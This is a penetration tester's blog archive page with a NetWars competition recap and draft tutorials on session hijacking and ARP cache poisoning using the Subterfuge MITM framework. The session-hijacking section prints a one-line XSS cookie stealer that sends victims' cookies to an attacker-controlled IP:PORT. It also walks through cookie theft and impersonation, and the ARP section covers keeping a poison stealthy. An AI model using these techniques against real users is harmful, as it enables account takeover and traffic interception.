Monthly Archives: December 2013

NetWars — Tournament of Champions

Last week I competed in the NetWars Tournament of Champions competition put on by SANS at their annual Cyber Defense Initiative in Washington, D.C. It was a great opportunity to flex one’s cyber muscle. Here is a link to their press release on the event.

NetwarsThe competitive atmosphere was palpable and as the tournament began ramping up you could very nearly taste the excitement in the air. It was obvious when the scoring servers opened, because one hundred or so giddy hackers were instantaneously shrouded in a mantle of silence. Game time! I battled my way through progressively challenging obstacles to the beat of some of the most… interesting… music I’ve ever heard in my life, but at the end of day one I was actually only in 9th place overall. Walking back into the room on day two instantly transported you back into the zone, and if our monotone responses to Ed Skoudis’ enthusiastic questions were anything to judge by; we were raring to go. When they finally released the hounds, it was as if we had immediately run into a brick wall. The new NetWars is much more difficult than its predecessor. I’d have to say that that is what helped me; when things got hard I started to shine.

Exposure, if there were a word for what I took away from NetWars that would be it. While trolling the Internet for tricks and practicing them against your own network is great, I really think that the best way to develop the critical thinking skills necessary to be a real threat, is to be confronted with something new. The bad guys have it easy. There is an overabundance of new yet juicy targets for them to interdict, readily available on the web. For the ethical hackers among us acquiring this experience is much more difficult, and we need it if we are to keep the wolves at bay. NetWars Tournament of Champions was an all-new sequence of challenges that forced you to evaluate the problem, hypothesize potential solutions, and finally break in. There are few ways to improve your tradecraft that can compare.

On to the spoils! Everyone invited to the Tournament of Champions received exceedingly nifty, yet awkward to wear, sound activated, flashing shirts. Unintended bonus, you can swap in the batteries from your shirt if your Bluetooth keyboard runs out of juice, nice!

Grand prize at NetWars Tournament of Champions – The Golden Ticket:

goldenticket2You have won FIRST PLACE in the second annual SANS NetWars Tournament of Champions, an achievement of outstanding, astonishing proportions. Through in-depth knowledge, cutting-edge skills, and deep cunning, you secured victory!

As the ultimate winner, winner you will enjoy a trip to spend an amazingly geektastic day at NetWars Research World Headquarters. You’ll observe first-hand the NetWars super-secret lair and command center. Your exclusive travel voucher is valid for up to $500 in flight costs, plus one night of hotel accommodations, and entitles you to spend a full day with Ed Skoudis and his team, seeing how they design, build, and operate SANS NetWars challenges.

It gets even better. You’ll tour the steam punk office, a perfect blend of 1880’s design and cutting-edge technology, infused with a collection of historical crypto systems and curious gadgets. Your adventure will include the Secret Room, the Secret-Secret Room, and experiments with a genuine World War Two Enigma machine. You’ll also feast with Ed and the team at a nearby restaurant, geeking out with in-depth discussions of all things infosec.

But, wait, there’s more! Best of all, during your special day, you’ll get to experience the new SANS NetWars CyberCity. This miniaturized town, chock full of NetWars missions, is our most ambitious challenge ever, designed to teach cyber warriors how cyber action can have kinetic effect against real-world systems. As the ultimate NetWars champion, you’ll get serious bragging rights as you complete several CyberCity missions!

Hereby duly signed, with hearty congratulations, by:

Ed Skoudis, Yori Kvitchko

I also received a plaque commemorating my victory:

championplaque2

Finally, the scoreboard at the end of the competition!

NetWarsScoreboard

HTTP Code Injection

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!

——————–

Here we are discussing the subject of session hijacking attacks within the scope of an HTTP/HTTPS conversation. It is important to note several distinctions here. Firstly, session hijacking is a vulnerability of many protocols, but we will only be examining web traffic, and secondly, performing session hijacking over HTTPS is a much more involved process then doing the same to its less evolved cousin. In this post we will not be directly attacking HTTPS, but we will; however, discuss methods to get around it.

Session Hijacking: The process of assuming control of an active or latent TCP/IP session through impersonation of a user by way of a session identifier as opposed to legitimate authentication credentials.

HTTP Sessions

Web is a stateless protocol. This means that the web server does not, and cannot remember who you are in between browser requests. Each time you click a link on a website the webserver thinks that you are an entirely new person. This facet of the protocol we have most closely come to identify with on the Internet is extremely problematic. If a web server does not remember who we are, how can it remember what is in our shopping cart, or more importantly whom that cart belongs to? To solve this issue we have session cookies.

Here’s an example of a session cookie embedded within a TCP Stream:

[Example Pic]

Most importantly, this cookie is sent along with every single HTTP request your browser makes to the associated web server. If we steal this cookie from a victim, and tell our browser to use it whilst communicating with the server, we can essentially become them. If you are interested in an example of how to modify your browser cookies through URL injection check out this [post].

Stealing Session Cookies

So how do we acquire session cookies from victims? Really the limit here is your creativity, but some criteria must be met. As the penetration tester you must be able to leverage some form of access to the flow of data that the cookie follows. This means you need access to either the data a rest, or the data in motion.

Data at Rest

With the exception of potential caching at proxies and other network resources there are two primary locations where cookies live: on the web server and on the client computer. We now have two targets.

Data in Motion

Alternately, if we have access to any host that must route the web traffic it is trivial to pull the session cookie out of the TCP stream, but there is a problem. These days most cookies are no longer sent across the Internet in plaintext. They use HTTPS. This means that access to routers along the path the data takes is not enough steal the plaintext cookie needed to perpetrate session hijacking. We’ll end by demonstrating a method to get around this issue using Subterfuge.

Attacking the Web Server

This attack requires the exploitation of some kind of vulnerability in a web application on the target web server. If you can get code to execute in the victims browser then you can steal their session cookies. It is important to note that we only need the victim’s browser to execute the code, not the web server itself. This means that we don’t need to be able to render a server based language like PHP. For our purposes JavaScript is good enough. Below is an example of a simple cookie stealer script:

document.location='http://IP:PORT/grab.cgi?'+document.cookie;

Once we inject this into the target website the simple act of a victim browsing to the webpage will cause the plaintext cookie to be transmitted to our webserver. The last step is to retrieve the cookies from our webserver. Typically this is done with a catcher script, but we’re going to be a bit different. Below is a bash script to pull the cookies out of your apache logs. By using this we can theoretically utilize a compromised webserver to perpetrate our attack without leaving behind any artifacts like a cookie stealer script!

[Apache Logs Cookie Parser Script]

Attacking the User

We will only be discussing the Firefox browser here; however, the same techniques can be applied regardless of browser. If you are able to trigger a vulnerability to gain access to a victim’s machine you may be able to directly access the cookie database associated with his browser profile. Firefox uses an SQLite database to store session cookies. In order to dump the database, run the following commands:

 

Then read the plaintext cookies!

Attacking the Network with Subterfuge

A new feature in Subterfuge 5.1 is Session Hijacking. Subterfuge comes with multiple methods of achieving a man-in-the-middle position on victim traffic. Now it can also harvest web session cookies. In order to do this, start a MITM attack. When a victim browses to a website that uses cookies Subterfuge will automatically log them and display the data on screen.

 

The next step is to use Subterfuge’s cookie swapper script to impersonate the victim. Click on CookieSwapper, and copy the JavaScript that pops up.

 

[CookieSwapper Pic]

 

Paste the script into a text editor. We now have to set the value of the cookie we want to impersonate. In Subterfuge, clicking on the session allows you to copy the cookie value.

 

[Cookie Copy Pic]

 

In your text editor replace section of the script that says “COOKIE DATA GOES HERE!!!” with the value you copied from subterfuge (be sure to put the data within “”).

The final step is to tell our browser to use this cookie when communicating with a target webserver. To this first browse to the target website. When you are there open your browser’s scripting console. This allows you to run arbitrary JavaScript within your browser window. In Chrome this can be done by: right click -> inspect element -> click on the “show console” icon in the bottom left corner. In Firefox (which we used in the making of this tutorial) use the key command: ctrl + shift + k. Paste your script into the console at the bottom of the page denoted by >.

 

[Script Console Pic]

 

Refresh the page and enjoy your session!

 

For a video of this attack in action click [here].

Countermeasures

 

I hope that this post thoroughly demonstrates the dangers of session hijacking. Attackers really don’t need your login username and password to wreak havoc on your online footprint. Don’t leave your security up to the vendors, or network operators, because they have no incentive to protect you! Take your security into your own hands.

 

To protect yourself from attacks like this one we recommend the use of encryption to encapsulate your traffic when operating on untrusted networks. OpenVPN is an outstanding protocol, and is fairly simple to setup as well. Client programs exist for all major operating systems including Android and iOS. Personally, I use [Link TunnelBlick] on my Mac, and the official clients elsewhere.

 

I hope that this post has been informative for you!

Rogue DHCP Server

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!

ARP Cache Poisoning

This page is currently under construction. The first draft is available, but more content must still be added be for the documentation is conclusive.  I apologize for the inconvenience.

Happy Hacking!

Click here to jump to ARP Poisoning with Subterfuge


ARP Cache Poisoning or ARP Spoofing is a network based attack that has been around for a long time; however, very little has been done address the vulnerability. The issue lies with the lack of authentication or even verification in the Address Resolution Protocol.  Though this attack is old it is still very effective, and if you think that it will be going away with IPv4 guess again. While the protocol has been removed in the IPv6 specification, the vulnerability still remains in a method call Neighbor Discovery Protocol, which is basically a very fancy rebranded ARP that solves problems in ARP’s network usage, but does nothing to fix the security issues.

Anatomy of the Attack

To understand ARP we first need to dive down into the network layers associated with it. Traffic traveling around your home network gets from one machine to another via layer 2 of the OSI model. More specifically, in a typical Local Area Network packets are switched not routed (as frames). This means that all that fancy TCP/IP overhead associated with the WAN is predominately a mute point. This makes our LANs much faster, but it also opens up these networks to additional strata of vulnerabilities. The Internet as we all know, uses IP addresses to get packets from one machine to another, but your LAN uses MAC address. In order to translate between the two standards, we have ARP.

So let us assume for a moment that your computer has an IP address it needs to send packets to: 192.168.1.1 and it is directly connected to the subnet 192.168.1.0/24 (this is the case with most home networks). Since it is connected to the same network as the target machine it must send the information as Ethernet frames, which means it needs the target’s MAC address not its IP. In order to get the MAC, it broadcasts to everyone on the network: ff:ff:ff:ff:ff (broadcast MAC address), and asks “Who has 192.168.1.1”. The response is supposed to be the MAC address of our destination.

Wireshark-ARP-Poison

In an ARP Spoofing attack all we have to do is respond to these requests with a different answer, namely, our MAC address. Now all traffic that you thought was going to 192.168.1.1 is actually going to the attacker instead. Furthermore, your computer remembers the last ARP response it gets, so if I spam these responses nonstop your computer will all ways use me as its target allowing me to sniff all the data you send to that host. If I poison your router, I can get all of your Internet traffic!


Subterfuge’s ARP Cache Poison

If you don’t care how Subterfuge does what it does, and you just want to know how to use it click here!

When we created Subterfuge (a framework to launch man-in-the-middle attacks) the first attack we gave it involved ARP Spoofing. We really wanted to stomp on the protocol, hard. Rather then just get the attack to work and release the product we spent a lot of time testing it against differing configurations and network devices. By its nature an ARP Cache Poison is a very unstable attack, and implementing it improperly can easily cause a denial of service against the target network. Naturally, this is not at all desired. Our research was focused on several key areas: Maintaining the Poison, Maximizing Stealth, and Network Stability.

Maintaining your Poison Versus Stealth & Stability

First we need to discuss the problem: losing a poison. How does it happen? On a typical network the router will occasionally send out a broadcast ARP packet letting anyone on the network know: “I’m still out there, and in case you were wondering here is my MAC Address”. That’s bad! Every time this happens we lose our poison against the network. When it comes to maintaining an ARP Poison most effectively there is one key: spam.  Because a client PC’s ARP table is always updated to reflect the most recent information it receives from the network, the best way to retain MITM is to send out as many poison packets as possible, but there’s a problem here. The primary reason ARP no longer exists in IPv6 is not security it’s overhead. Larger networks already tend to have so much ARP traffic that they experience a performance hit. Spamming packets as fast as your NIC can handle is definitely not the optimum solution from a network stability standpoint. Our research indicated that most routers tend to re-ARP a network anywhere between every 8-16 seconds.  To combat this Subterfuge by default poisons the network on an 8 second interval, but finer control is available through the settings page.

Unfortunately, this means that if you lose the poison you could be out of luck for up to 8 seconds. To combat this Subterfuge employs Dynamic ARP Retention, the concept here is that by listening on the wire for ARP messages from router you can hear the natural responses and spoof poison packets to match them. In practice this can cause an ARP storm on some networks and result in a denial of service condition. By default this setting is disabled; however, when enabled it can significantly bolster the stability of your attack. Lastly, you can adjust the rate of poison packets attacking the network manually from the settings page.

Poisoning with Subterfuge

Video coming soon!

WPAD Hijacking

This page is currently under construction. It exists as a placeholder for a Subterfuge tutorial, once the tutorial is finished I will update the page to reflect the new content. I apologize for the inconvenience.

Happy Hacking!